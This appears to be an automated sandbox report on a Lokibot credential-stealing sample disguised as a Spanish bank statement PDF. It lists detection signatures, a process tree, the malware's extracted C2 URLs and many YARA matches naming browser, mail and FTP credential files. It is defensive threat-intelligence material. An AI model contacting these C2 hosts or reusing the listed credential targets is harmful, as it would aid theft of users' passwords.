Edit tour

Windows Analysis Report
Informe bancario.pdf.exe

Overview

General Information

Sample Name:	Informe bancario.pdf.exe
Analysis ID:	651256
MD5:	603fe9a434da79407213db7d4b907789
SHA1:	812797eae86b27f54e5caadb021a4c00c31e4a7e
SHA256:	07776cc1a0981b4143d63533a5e30f2deb4f545f4d27544cda60f5d07b602593
Tags:	exeLoki
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Yara detected Lokibot

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected aPLib compressed binary

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to steal Mail credentials (via file registry)

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

.NET source code contains potential unpacker

Yara detected Generic Downloader

C2 URLs / IPs found in malware configuration

Uses an obfuscated file name to hide its real file extension (double extension)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

Informe bancario.pdf.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\Informe bancario.pdf.exe" MD5: 603FE9A434DA79407213DB7D4B907789)

Informe bancario.pdf.exe (PID: 6800 cmdline: C:\Users\user\Desktop\Informe bancario.pdf.exe MD5: 603FE9A434DA79407213DB7D4B907789)

Informe bancario.pdf.exe (PID: 6824 cmdline: C:\Users\user\Desktop\Informe bancario.pdf.exe MD5: 603FE9A434DA79407213DB7D4B907789)

cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://kossa.xyz/esi/pp/play.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2eedf:$des3: 68 03 66 00 00 0x332d0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x3339c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1be9bf:$des3: 68 03 66 00 00 0x1c2dbc:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1c2e88:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13eff:$des3: 68 03 66 00 00 0x182f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x183bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: Informe bancario.pdf.exe PID: 6496	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Informe bancario.pdf.exe PID: 6496	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Informe bancario.pdf.exe PID: 6496	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Informe bancario.pdf.exe PID: 6824	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Informe bancario.pdf.exe PID: 6824	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Click to see the 43 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x2fc98:$s1: http:// 0x33453:$s1: http:// 0x33e94:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x2fca0:$s2: https:// 0x2fc98:$f1: http:// 0x33453:$f1: http:// 0x2fca0:$f2: https://
0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x32356:$f1: FileZilla\recentservers.xml 0x32396:$f2: FileZilla\sitemanager.xml 0x30606:$b2: Mozilla\Firefox\Profiles 0x30370:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x3051a:$s4: logins.json 0x313c4:$s6: wand.dat 0x2fe44:$a1: username_value 0x2fe34:$a2: password_value 0x3047f:$a3: encryptedUsername 0x304ec:$a3: encryptedUsername 0x30492:$a4: encryptedPassword 0x30500:$a4: encryptedPassword
0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x2fbd4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x2fe1c:$a2: last_compatible_version
0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2ee1f:$des3: 68 03 66 00 00 0x33210:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x332dc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Informe bancario.pdf.exe.39f9f00.10.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
0.2.Informe bancario.pdf.exe.39f9f00.10.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Informe bancario.pdf.exe.39f9f00.10.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Informe bancario.pdf.exe.39f9f00.10.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.0.Informe bancario.pdf.exe.400000.12.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
5.0.Informe bancario.pdf.exe.400000.12.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.0.Informe bancario.pdf.exe.400000.12.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.0.Informe bancario.pdf.exe.400000.12.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.0.Informe bancario.pdf.exe.400000.12.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
5.0.Informe bancario.pdf.exe.400000.12.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.0.Informe bancario.pdf.exe.400000.12.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x3b624:$s1: http:// 0x3eddf:$s1: http:// 0x3f838:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x3b62c:$s2: https:// 0x3b624:$f1: http:// 0x3eddf:$f1: http:// 0x3b62c:$f2: https://
0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x3dce2:$f1: FileZilla\recentservers.xml 0x3dd22:$f2: FileZilla\sitemanager.xml 0x3bf92:$b2: Mozilla\Firefox\Profiles 0x3bcfc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x3bea6:$s4: logins.json 0x3cd50:$s6: wand.dat 0x3b7d0:$a1: username_value 0x3b7c0:$a2: password_value 0x3be0b:$a3: encryptedUsername 0x3be78:$a3: encryptedUsername 0x3be1e:$a4: encryptedPassword 0x3be8c:$a4: encryptedPassword
0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x3b560:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x3b7a8:$a2: last_compatible_version
0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x3a79f:$des3: 68 03 66 00 00 0x3eb9c:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x3ec68:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.0.Informe bancario.pdf.exe.400000.12.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.0.Informe bancario.pdf.exe.400000.12.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.0.Informe bancario.pdf.exe.400000.12.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.0.Informe bancario.pdf.exe.400000.12.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
5.0.Informe bancario.pdf.exe.400000.12.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
5.0.Informe bancario.pdf.exe.400000.12.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.0.Informe bancario.pdf.exe.400000.8.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
5.0.Informe bancario.pdf.exe.400000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.0.Informe bancario.pdf.exe.400000.8.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.0.Informe bancario.pdf.exe.400000.8.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.0.Informe bancario.pdf.exe.400000.8.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
5.0.Informe bancario.pdf.exe.400000.8.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.0.Informe bancario.pdf.exe.400000.8.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.0.Informe bancario.pdf.exe.400000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
5.0.Informe bancario.pdf.exe.400000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.0.Informe bancario.pdf.exe.400000.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.0.Informe bancario.pdf.exe.400000.4.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.0.Informe bancario.pdf.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
5.0.Informe bancario.pdf.exe.400000.4.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.0.Informe bancario.pdf.exe.400000.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Informe bancario.pdf.exe.39dfee0.9.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
0.2.Informe bancario.pdf.exe.39dfee0.9.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Informe bancario.pdf.exe.39dfee0.9.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Informe bancario.pdf.exe.39dfee0.9.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.0.Informe bancario.pdf.exe.400000.14.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
5.0.Informe bancario.pdf.exe.400000.14.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.0.Informe bancario.pdf.exe.400000.14.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.0.Informe bancario.pdf.exe.400000.14.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
